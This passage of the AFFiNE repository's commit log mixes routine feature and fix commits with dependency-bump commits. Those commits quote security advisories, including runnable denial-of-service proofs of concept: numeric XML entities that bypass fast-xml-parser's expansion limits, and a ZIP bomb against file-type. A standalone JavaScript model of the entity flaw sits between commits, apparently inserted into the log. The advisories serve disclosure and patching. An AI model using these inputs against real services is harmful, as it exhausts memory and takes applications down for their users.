`maxEntitySize`) to prevent XML entity expansion Denial of Service.
However, these limits are only enforced for DOCTYPE-defined entities.
**Numeric character references** (`&#NNN;` and `&#xHH;`) and standard
XML entities (`&lt;`, `&gt;`, etc.) are processed through a separate
code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to
completely bypass all configured limits, causing excessive memory
allocation and CPU consumption.

## Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

## Root Cause

In `src/xmlparser/OrderedObjParser.js`, the `replaceEntitiesValue()`
function has two separate entity replacement loops:

1. **Lines 638-670**: DOCTYPE entities — expansion counting with
`entityExpansionCount` and `currentExpandedLength` tracking. This was
the CVE-2026-26278 fix.
2. **Lines 674-677**: `lastEntities` loop — replaces standard entities
including `num_dec` (`/&#([0-9]{1,7});/g`) and `num_hex`
(`/&#x([0-9a-fA-F]{1,6});/g`). **This loop has NO expansion counting at
all.**

The numeric entity regex replacements at lines 97-98 are part of
`lastEntities` and go through the uncounted loop, completely bypassing
the CVE-2026-26278 fix.

## Proof of Concept

```javascript
const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100
```

**Results:**
- 100K `&#65;` references → 500,000 char output (5x default
maxExpandedLength of 100,000)
- 1M references → 5,000,000 char output, ~147MB memory consumed
- Even with `maxTotalExpansions=10` and `maxExpandedLength=100`, 10K
references produce 50,000 chars
- Hex entities (`&#x41;`) exhibit the same bypass

## Impact

**Denial of Service** — An attacker who can provide XML input to
applications using fast-xml-parser can cause:
- Excessive memory allocation (147MB+ for 1M entity references)
- CPU consumption during regex replacement
- Potential process crash via OOM

This is particularly dangerous because the application developer may
have explicitly configured strict entity expansion limits believing they
are protected, while numeric entities silently bypass all of them.

## Suggested Fix

Apply the same `entityExpansionCount` and `currentExpandedLength`
tracking to the `lastEntities` loop (lines 674-677) and the HTML
entities loop (lines 680-686), similar to how DOCTYPE entities are
tracked at lines 638-670.

## Workaround

Set `htmlEntities:false`

---

### Release Notes

<details>
<summary>NaturalIntelligence/fast-xml-parser (fast-xml-parser)</summary>

###
[`v5.5.6`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/e54155f53048e9d58e27f170d3ccff15176b6671...870043e75e78545192bc70950c6286d36c7cdf23)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6)

###
[`v5.5.5`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/ea07bb2e8435a88136c0e46d7ee8a345107b7582...e54155f53048e9d58e27f170d3ccff15176b6671)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.4...v5.5.5)

###
[`v5.5.4`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...ea07bb2e8435a88136c0e46d7ee8a345107b7582)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.4)

###
[`v5.5.3`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3)

###
[`v5.5.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...e0a14f7d15a293732e630ce1b7faa39924de2359)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2)

###
[`v5.5.1`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.1):
integrate path-expression-matcher

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.0...v5.5.1)

- support path-expression-matcher
- fix: stopNode should not be parsed
- performance improvement for stopNode checking

###
[`v5.5.0`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...ce017923460f92861e8fc94c91e52f9f5bd6a1b0)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...v5.5.0)

###
[`v5.4.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-18 13:28:53 +08:00
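The root cause described in the advisory above (DOCTYPE entities counted against the limits, numeric and predefined references expanded by a second, uncounted loop) can be modelled in a few lines. This is an added example, not fast-xml-parser's code and not part of the commit: `expandEntities`, `tryExpand`, `countCharRefs` and the `chargeCharRefs` switch are hypothetical names, only the two limit names are taken from the advisory, and the input is constructed.

```javascript
'use strict';

class ExpansionLimitError extends Error {}

const PREDEFINED = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
// Digit bounds mirror the num_dec / num_hex regexes quoted in the advisory.
const CHAR_REF = /&(#x[0-9a-fA-F]{1,6}|#[0-9]{1,7}|lt|gt|amp|quot|apos);/g;

// One budget for the whole value: every expansion, of any kind, is charged here.
function makeBudget({ maxTotalExpansions, maxExpandedLength }) {
  let count = 0;
  let length = 0;
  return (expanded) => {
    count += 1;
    length += expanded.length;
    if (count > maxTotalExpansions) {
      throw new ExpansionLimitError(`more than ${maxTotalExpansions} expansions`);
    }
    if (length > maxExpandedLength) {
      throw new ExpansionLimitError(`expanded text longer than ${maxExpandedLength}`);
    }
    return expanded;
  };
}

// Decode one character reference; invalid code points are left as written.
function decodeCharRef(match, body) {
  if (body[0] !== '#') return PREDEFINED[body];
  const hex = body[1] === 'x';
  const cp = Number.parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
  const valid = cp > 0 && cp <= 0x10ffff && !(cp >= 0xd800 && cp <= 0xdfff);
  return valid ? String.fromCodePoint(cp) : match;
}

// chargeCharRefs=false models the flaw: only DOCTYPE entities hit the budget.
// chargeCharRefs=true is the hardened form: both passes share the same budget.
function expandEntities(text, doctypeEntities, limits, { chargeCharRefs }) {
  const charge = makeBudget(limits);
  let out = text;
  for (const [name, value] of Object.entries(doctypeEntities)) {
    out = out.replaceAll(`&${name};`, () => charge(value));
  }
  // Single pass over character references, so "&amp;lt;" is not decoded twice.
  return out.replace(CHAR_REF, (match, body) => {
    const decoded = decodeCharRef(match, body);
    return chargeCharRefs ? charge(decoded) : decoded;
  });
}

// Same call, but a limit violation is reported as a value instead of thrown.
function tryExpand(text, doctypeEntities, limits, opts) {
  try {
    return { ok: true, value: expandEntities(text, doctypeEntities, limits, opts) };
  } catch (err) {
    if (!(err instanceof ExpansionLimitError)) throw err;
    return { ok: false, reason: err.message };
  }
}

// Pre-parse guard for input headed to a parser that cannot be upgraded yet:
// count references in the raw text and reject before parsing if over a cap.
function countCharRefs(xml) {
  const matches = xml.match(CHAR_REF);
  return matches ? matches.length : 0;
}

// Constructed sample: 50 numeric references plus one predefined entity.
const LIMITS = { maxTotalExpansions: 10, maxExpandedLength: 100 };
const SAMPLE = `<root>${'&#65;'.repeat(50)}&lt;</root>`;

const flawed = tryExpand(SAMPLE, {}, LIMITS, { chargeCharRefs: false });
const hardened = tryExpand(SAMPLE, {}, LIMITS, { chargeCharRefs: true });
console.log('uncounted loop :', flawed.ok ? `accepted, ${flawed.value.length} chars` : flawed.reason);
console.log('shared budget  :', hardened.ok ? 'accepted' : `rejected (${hardened.reason})`);
console.log('references seen:', countCharRefs(SAMPLE));
```

With `maxTotalExpansions: 10`, the uncounted path accepts all 51 references while the shared budget rejects the input at the eleventh.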
DarkSky 4ce68d74f1 fix(editor): chat cannot scroll on windows (#14677)
fix #14529 
fix #14612 
replace #14614 #14657


#### PR Dependency Tree


* **PR #14677** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Tests**
* Added test coverage for scroll position tracking and pinned scroll
behavior in AI chat
* Added test suite verifying scroll-to-end and scroll-to-position
functionality

* **New Features**
* Introduced configurable scrollable option for text rendering in AI
chat components, allowing control over scroll behavior

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-18 13:28:05 +08:00
chauhan_s fbfcc01d14 fix(core): reserve space for auth input error to avoid layout shift (#14670)
Prevents layout shift when showing auth input errors by reserving space
for the error message. Improves visual stability and avoids UI jumps
when validation errors appear.

### Before 


https://github.com/user-attachments/assets/7439aa5e-069d-42ac-8963-e5cdee341ad9



### After

https://github.com/user-attachments/assets/8e758452-5323-4807-8a0d-38913303020d


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Improved error message display mechanism in authentication components
for more consistent rendering.

* **Style**
* Enhanced vertical spacing for error messages in form inputs to ensure
better visual consistency and readability.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-18 10:48:50 +08:00
DarkSky 1112a06623 fix: ci 2026-03-17 23:32:57 +08:00
chauhan_s bbcb7e69fe fix: correct "has accept" to "has accepted" (#14669)
fixes #14407

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Corrected grammar in the notification message displayed when an
invitation is accepted.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-17 23:29:28 +08:00
steffenrapp cc2f23339e feat(i18n): update German translation (#14674)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Documentation**
* Enhanced German language support with new translations for Obsidian
import, MCP server integration, and Copilot features. Improved error
message translations for better clarity and consistency.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-17 23:28:36 +08:00
chauhan_s 31101a69e7 fix: Refine verify email dialog for verify and change email flows (#14671)
### Summary
This PR improves the verify email dialog by giving the verify-email and
change-email flows distinct messaging instead of reusing the same
generic copy.

### What changed
* Use flow-specific body copy in the verify email dialog
* Keep the existing action-specific subtitle behavior for:
  * Verify email
  * Change email
* Update the English i18n strings so each flow explains the correct
intent:
  * Verify email focuses on confirming email ownership
  * Change email focuses on securely starting the email-change process
### Why
The previous dialog message was shared across both flows, which made the
change-email experience feel ambiguous. This update makes the intent
clearer for users and better matches the action they are taking.



https://www.loom.com/share/c64c20570a8242358bd178a2ac50e413


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved clarity in email verification and email change dialog
messages to better explain the confirmation process and link purpose.
* Enhanced distinction between email verification and email change
workflows with context-specific messaging.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-17 23:28:16 +08:00
Francisco Jiménez 0b1a44863f feat(editor): add obsidian vault import support (#14593)
fix #14592 

### Description
> 🤖 **Note:** The code in this Pull Request was developed with the
assistance of AI, but has been thoroughly reviewed and manually tested.

> I noticed there's a check when opening an issue that asks _"Is your
content generated by AI?"_, so I mention it here in case it's a deal
breaker. If so I understand, you can close the PR, just wanted to share
this in case it's useful anyways.

This PR introduces **Obsidian Vault Import Support** to AFFiNE. 

Previously, users migrating from Obsidian had to rely on the generic
Markdown importer, which often resulted in broken cross-links, missing
directory structures, and metadata conflicts because Obsidian relies
heavily on proprietary structures not supported by standard Markdown.

This completely new feature makes migrating to AFFiNE easy.

**Key Features & Implementations:**

1. **Vault (Directory) Selection**
- Utilizes the `openDirectory` blocksuite utility in the import modal to
allow users to select an entire folder directly from their filesystem,
maintaining file context rather than forcing `.zip` uploads.

2. **Wikilink Resolution (Two-Pass Import)**
- Restructured the `importObsidianVault` process into a two-pass
architecture.
- **Pass 1:** Discovers all files, assigns new AFFiNE document IDs, and
maps them efficiently (by title, alias, and filename) into a
high-performance hash map.
- **Pass 2:** Processes the generic markdown AST and correctly maps
custom `[[wikilinks]]` to the actual pre-registered AFFiNE blocksuite
document IDs via `obsidianWikilinkToDeltaMatcher`.
- Safely strips leading emojis from wikilink aliases to prevent
duplicated page icons rendering mid-sentence.

3. **Emoji Metadata & State Fixes**
- Implemented an aggressive, single-pass RegExp to extract multiple
leading/combining emojis (`Emoji_Presentation` / `\ufe0f`) from H1
headers and Frontmatter. Emojis are assigned specifically to the page
icon metadata property and cleanly stripped from the visual document
title.
- Fixed a core mutation bug where the loop iterating over existing
`docMetas` was aggressively overwriting newly minted IDs for the current
import batch. This fully resolves the issue where imported pages
(especially re-imports) were incorrectly flagged as `trashed`.
   - Enforces explicit `trash: false` patch instructions.

4. **Syntax Conversion**
- Implemented conversion of Obsidian-style Callouts (`> [!NOTE] Title`)
into native AFFiNE block formats (`> 💡 **Title**`).
- Hardened the `blockquote` parser so that nested structures (like `> -
list items`) are fully preserved instead of discarded.

### UI Changes
- Updated the Import Modal to include the "Import Obsidian Vault" flow
utilizing the native filesystem directory picker.
- Regenerated and synced `i18n-completenesses.json` correctly up to 100%
across all supported locales for the new modal string additions.

### Testing Instructions
1. Navigate to the Workspace sidebar and click "Import".
2. Select "Obsidian" and use the directory picker to define a
comprehensive Vault folder.
3. Validate that cross-links between documents automatically resolve to
their specific AFFiNE instances.
4. Validate documents containing leading Emojis display exactly one
Emoji (in the page icon area), and none duplicated in the actual title
header.
5. Validate Callouts are rendered cleanly and correctly, and no
documents are incorrectly marked as "Trash".


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Import Obsidian vaults with wikilink resolution, emoji/title
preservation, asset handling, and automatic document creation.
* Folder-based imports via a Directory Picker (with hidden-input
fallback) integrated into the import dialog.

* **Localization**
  * Added Obsidian import label and tooltip translations.

* **Tests**
* Added end-to-end tests validating Obsidian vault import and asset
handling.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-03-17 00:49:17 +08:00
DarkSky 8406f9656e perf(editor): improve bounding box calc caching (#14668)
#### PR Dependency Tree


* **PR #14668** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-03-16 23:35:38 +08:00
DarkSky 121c0d172d feat(server): improve doc tools error handle (#14662)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Centralized sync/status messages for cloud document sync and explicit
user-facing error types.
* Frontend helpers to detect and display tool errors with friendly
names.

* **Bug Fixes**
* Consistent, actionable error reporting for document and attachment
reads instead of silent failures.
* Search and semantic tools now validate workspace sync and permissions
and return clear responses.

* **Tests**
* Added comprehensive tests covering document/blob reads, search tools,
and sync/error paths.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-16 02:20:35 +08:00
renovate[bot] 8f03090780 chore: bump up Lakr233/MarkdownView version to from: "3.8.2" (#14658)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [Lakr233/MarkdownView](https://redirect.github.com/Lakr233/MarkdownView) | minor | `from: "3.6.3"` → `from: "3.8.2"` |

---

### Release Notes

<details>
<summary>Lakr233/MarkdownView (Lakr233/MarkdownView)</summary>

###
[`v3.8.2`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.1...3.8.2)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.1...3.8.2)

###
[`v3.8.1`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.0...3.8.1)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.0...3.8.1)

###
[`v3.8.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.7.0...3.8.0)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.7.0...3.8.0)

###
[`v3.7.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.3...3.7.0)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.3...3.7.0)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-16 00:57:48 +08:00
renovate[bot] 8125cc0e75 chore: bump up Lakr233/ListViewKit version to from: "1.2.0" (#14617)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [Lakr233/ListViewKit](https://redirect.github.com/Lakr233/ListViewKit) | minor | `from: "1.1.8"` → `from: "1.2.0"` |

---

### Release Notes

<details>
<summary>Lakr233/ListViewKit (Lakr233/ListViewKit)</summary>

###
[`v1.2.0`](https://redirect.github.com/Lakr233/ListViewKit/compare/1.1.8...1.2.0)

[Compare
Source](https://redirect.github.com/Lakr233/ListViewKit/compare/1.1.8...1.2.0)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-14 23:45:32 +08:00
renovate[bot] f537a75f01 chore: bump up file-type version to v21.3.2 [SECURITY] (#14655)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [file-type](https://redirect.github.com/sindresorhus/file-type) | [`21.3.1` → `21.3.2`](https://renovatebot.com/diffs/npm/file-type/21.3.1/21.3.2) | ![age](https://developer.mend.io/api/mc/badges/age/npm/file-type/21.3.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/file-type/21.3.1/21.3.2?slim=true) |

### GitHub Vulnerability Alerts

####
[CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473)

### Impact
A denial of service vulnerability exists in the ASF (WMV/WMA) file type
detection parser. When parsing a crafted input where an ASF sub-header
has a `size` field of zero, the parser enters an infinite loop. The
`payload` value becomes negative (-24), causing
`tokenizer.ignore(payload)` to move the read position backwards, so the
same sub-header is read repeatedly forever.

Any application that uses `file-type` to detect the type of
untrusted/attacker-controlled input is affected. An attacker can stall
the Node.js event loop with a 55-byte payload.

### Patches
Fixed in version 21.3.1. Users should upgrade to >= 21.3.1.

### Workarounds
Validate or limit the size of input buffers before passing them to
`file-type`, or run file type detection in a worker thread with a
timeout.

### References
- Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f

### Reporter

crnkovic@lokvica.com

####
[CVE-2026-32630](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-j47w-4g3g-c36v)

## Summary

A crafted ZIP file can trigger excessive memory growth during type
detection in `file-type` when using `fileTypeFromBuffer()`,
`fileTypeFromBlob()`, or `fileTypeFromFile()`.

In affected versions, the ZIP inflate output limit is enforced for
stream-based detection, but not for known-size inputs. As a result, a
small compressed ZIP can cause `file-type` to inflate and process a much
larger payload while probing ZIP-based formats such as OOXML. In testing
on `file-type` `21.3.1`, a ZIP of about `255 KB` caused about `257 MB`
of RSS growth during `fileTypeFromBuffer()`.

This is an availability issue. Applications that use these APIs on
untrusted uploads can be forced to consume large amounts of memory and
may become slow or crash.

## Root Cause

The ZIP detection logic applied different limits depending on whether
the tokenizer had a known file size.

For stream inputs, ZIP probing was bounded by
`maximumZipEntrySizeInBytes` (`1 MiB`). For known-size inputs such as
buffers, blobs, and files, the code instead used
`Number.MAX_SAFE_INTEGER` in two relevant places:

```js
const maximumContentTypesEntrySize = hasUnknownFileSize(tokenizer)
	? maximumZipEntrySizeInBytes
	: Number.MAX_SAFE_INTEGER;
```

and:

```js
const maximumLength = hasUnknownFileSize(this.tokenizer)
	? maximumZipEntrySizeInBytes
	: Number.MAX_SAFE_INTEGER;
```

Together, these checks allowed a crafted ZIP to bypass the intended
inflate limit for known-size APIs and force large decompression during
detection of entries such as `[Content_Types].xml`.

## Proof of Concept

```js
import {fileTypeFromBuffer} from 'file-type';
import archiver from 'archiver';
import {Writable} from 'node:stream';

async function createZipBomb(sizeInMegabytes) {
	return new Promise((resolve, reject) => {
		const chunks = [];
		const writable = new Writable({
			write(chunk, encoding, callback) {
				chunks.push(chunk);
				callback();
			},
		});

		const archive = archiver('zip', {zlib: {level: 9}});
		archive.pipe(writable);
		writable.on('finish', () => {
			resolve(Buffer.concat(chunks));
		});
		archive.on('error', reject);

		const xmlPrefix = '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">';
		const padding = Buffer.alloc(sizeInMegabytes * 1024 * 1024 - xmlPrefix.length, 0x20);
		archive.append(Buffer.concat([Buffer.from(xmlPrefix), padding]), {name: '[Content_Types].xml'});
		archive.finalize();
	});
}

const zip = await createZipBomb(256);
console.log('ZIP size (KB):', (zip.length / 1024).toFixed(0));

const before = process.memoryUsage().rss;
await fileTypeFromBuffer(zip);
const after = process.memoryUsage().rss;

console.log('RSS growth (MB):', ((after - before) / 1024 / 1024).toFixed(0));
```

Observed on `file-type` `21.3.1`:
- ZIP size: about `255 KB`
- RSS growth during detection: about `257 MB`

## Affected APIs

Affected:
- `fileTypeFromBuffer()`
- `fileTypeFromBlob()`
- `fileTypeFromFile()`

Not affected:
- `fileTypeFromStream()`, which already enforced the ZIP inflate limit
for unknown-size inputs

## Impact

Applications that inspect untrusted uploads with `fileTypeFromBuffer()`,
`fileTypeFromBlob()`, or `fileTypeFromFile()` can be forced to consume
excessive memory during ZIP-based type detection. This can degrade
service or lead to process termination in memory-constrained
environments.

## Cause

The issue was introduced in 399b0f1

---

### Release Notes

<details>
<summary>sindresorhus/file-type (file-type)</summary>

###
[`v21.3.2`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.2)

[Compare
Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.1...v21.3.2)

- Fix ZIP bomb in known-size ZIP probing (GHSA-j47w-4g3g-c36v)
[`a155cd7`](https://redirect.github.com/sindresorhus/file-type/commit/a155cd7)
- Fix bound recursive BOM and ID3 detection
[`370ed91`](https://redirect.github.com/sindresorhus/file-type/commit/370ed91)

***

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-14 23:44:06 +08:00
renovate[bot] 9456a07889 chore: migrate Renovate config (#14656)
The Renovate config in this repository needs migrating. Typically this
is because one or more configuration options you are using have been
renamed.

You don't need to merge this PR right away, because Renovate will
continue to migrate these fields internally each time it runs. But later
some of these fields may be fully deprecated and the migrations removed.
So it's a good idea to merge this migration PR soon.





🔕 **Ignore**: Close this PR and you won't be reminded about config
migration again, but one day your current config may no longer be valid.

Got questions? Does something look wrong to you? Please don't hesitate
to [request help
here](https://redirect.github.com/renovatebot/renovate/discussions).


---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-14 23:43:39 +08:00
sahilkhan09k 8f571ddc30 fix: ensure images load correctly when printing to PDF (#14618)
Fixes #14304

## Summary
This PR resolves an issue where images sometimes fail to appear when
exporting or printing AFFiNE pages to PDF. The issue occurs because
images may not finish loading inside the hidden print iframe before
`window.print()` is triggered.

## Changes
- Avoid using `display: none` for the print iframe and instead keep it
hidden while remaining in the rendering tree to ensure resources load
correctly.
- Remove `loading="lazy"` from all images before printing to prevent
viewport-based lazy loading from blocking image fetches.
- Force image reload by reassigning the `src` attribute after removing
lazy loading.
- Add a `waitForImages` helper to ensure all images (including those
inside Shadow DOM) finish loading before calling `window.print()`.
- Improve reliability by checking both `img.complete` and
`img.naturalWidth` to confirm successful image loading.
- Wait for fonts using `document.fonts.ready` before triggering the
print dialog.

## Verification
1. Run AFFiNE in development mode: npm run dev
2. Open a page containing multiple images.
3. Click **Print** and select **Save as PDF** (or any PDF printer).
4. Verify that all images appear correctly in the generated PDF.

## Notes
This change focuses only on improving the reliability of the existing
print-to-PDF workflow without altering any feature flags or export
behavior.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved PDF export reliability by waiting for all images (including
inside shadow content) and fonts to load before printing.
* Removed lazy-loading interference so images reliably appear in
exports.
* Ensured styles and light-theme attributes are consistently applied to
the print document.

* **Improvements**
* More robust print preparation using a hidden-but-rendering iframe
document, deep-cloning content (flattening shadow DOM), and preserved
canvas mapping for accurate renders.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-13 09:57:07 +08:00
Mohad 13ad1beb10 feat(i18n): automatic RTL layout for Arabic, Persian, and Urdu + complete Arabic translations (#14624)
## Changes

### RTL Support (automatic, locale-driven)
- Add `rtl?: boolean` metadata to locale definitions in
`SUPPORTED_LANGUAGES`
- Set `rtl: true` for Arabic (`ar`), Persian (`fa`), and Urdu (`ur`)
- Automatically set `document.documentElement.dir` based on locale RTL
metadata on language change
- Remove hardcoded `lang="en"` from HTML template — JS now controls both
`lang` and `dir`

### Arabic Translations
- Add 100 missing keys to `ar.json` (Calendar integration, Doc
Analytics, MCP Server, AI Chat, and more)
- Arabic locale now has 2,313/2,313 keys (100% coverage, matches
`en.json` exactly)

## Testing
Switching to Arabic/Persian/Urdu now automatically flips the entire UI
layout to RTL without any manual feature flag.

Fixes #7099

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added Right-to-Left (RTL) support for Arabic, Persian, and Urdu with
automatic document direction and language attributes when a language is
selected.

* **Refactor**
* Centralized and reordered internal language handling so document
language and direction are applied earlier and consistently.

* **Chore**
  * Set a default text direction attribute on the base HTML template.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-12 23:14:19 +08:00
sahilkhan09k 9844ca4d54 fix(editor): ensure code and quote blocks render correctly in print (#14613)
Fixes #14608

## Summary

Fix printing issues when exporting documents while using the dark theme.

Previously, when printing or saving a document as PDF in dark mode, text
color was forced to black while some block containers (such as code
blocks and quotes) retained their dark backgrounds. This resulted in
**black text on dark backgrounds**, making the content unreadable in the
exported PDF.

## Changes

* Reset relevant CSS variables in the `@media print` section of
`print-to-pdf.ts`.
* Ensure block containers such as **code blocks and quotes** render with
light backgrounds during printing.
* Maintain readable text colors by forcing text color to black for print
output.

This approach updates the **CSS variables used by BlockSuite
components**, ensuring that elements relying on variables like
`--affine-background-code-block` and `--affine-quote-color` correctly
switch to light backgrounds in print mode.

## Result

Documents printed or exported as PDF from dark mode now render correctly
with:

* readable text
* proper light backgrounds for code blocks and quotes
* consistent formatting in print output


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Style**
* Enhanced print-to-PDF styling for improved visual presentation of code
blocks, quotes, and borders when exporting or printing documents to
maintain better readability and consistency.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->

Co-authored-by: sahilkhan09k <sahilkhan392005@gmail.com>
2026-03-11 15:07:09 +08:00
renovate[bot] d7d67841b8 chore: bump up file-type version to v21.3.1 [SECURITY] (#14625)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [file-type](https://redirect.github.com/sindresorhus/file-type) | [`21.3.0` → `21.3.1`](https://renovatebot.com/diffs/npm/file-type/21.3.0/21.3.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/file-type/21.3.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/file-type/21.3.0/21.3.1?slim=true) |

### GitHub Vulnerability Alerts

####
[CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473)

### Impact
